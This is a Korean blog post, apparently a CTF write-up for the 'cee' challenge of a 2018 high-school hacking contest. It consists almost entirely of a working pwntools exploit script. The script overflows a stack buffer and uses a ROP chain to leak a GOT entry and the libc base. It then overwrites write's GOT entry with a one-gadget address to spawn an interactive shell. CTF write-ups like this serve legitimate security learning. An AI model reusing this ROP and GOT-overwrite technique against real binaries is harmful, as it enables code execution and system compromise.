hOwDayS 선린 10720
선린인터넷고등학교 교내해킹방어대회 2018 cee 본문
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 | from pwn import * pop_RSI_R15 = 0x0000000000400a51 main_read = 0x40099E main = 0x400716 oneshot = 0x45216 p = process("./cee") e = ELF("./cee") def SETTING(): p.recv() p.sendline("2018-11-15") ## KOREAN ## p.recv() p.sendline("-1") ## ENDLISH ## p.recv() p.sendline("-1") ## MATH ## p.recv() p.sendline("-1") ## EXPLOIT ## SETTING() # STAGE 1 : Leak : libc_base # #RSI = buf #RDI = fd p.recv() payload1 = "A" * 0x30 payload1 += "A" * 8 payload1 += p64(pop_RSI_R15) payload1 += p64(e.got['printf']) payload1 += p64(1) payload1 += p64(e.plt['write']) payload1 += p64(main) p.send(payload1) p.recvuntil("Thank You!!") libc_base = u64(p.recv(8)) - 0x55800 p.success("Leak libc_base : " + hex(libc_base)) p.success("oneshot Address : " + hex(libc_base + oneshot)) SETTING() # STAGE 2 : overwrite write to oneshot # #RSI = buf #RDI = fd ( using main ) payload2 = "A" * 0x30 payload2 += "A" * 8 payload2 += p64(pop_RSI_R15) payload2 += p64(e.got['write']) payload2 += p64(0) payload2 += p64(main_read) p.send(payload2) p.send(p64(libc_base+oneshot)) p.interactive() | cs |
'CTF' 카테고리의 다른 글
h3xor ctf easy (0) | 2018.06.17 |
---|---|
선린인터넷고등학교 교내해킹방어대회 2018 vss (0) | 2018.06.11 |
선린인터넷고등학교 교내해킹방어대회 2018 SHELLCODING (0) | 2018.06.07 |
ASISCTF FCascasde (0) | 2018.05.05 |
ASISCTF CAT (0) | 2018.05.05 |
Comments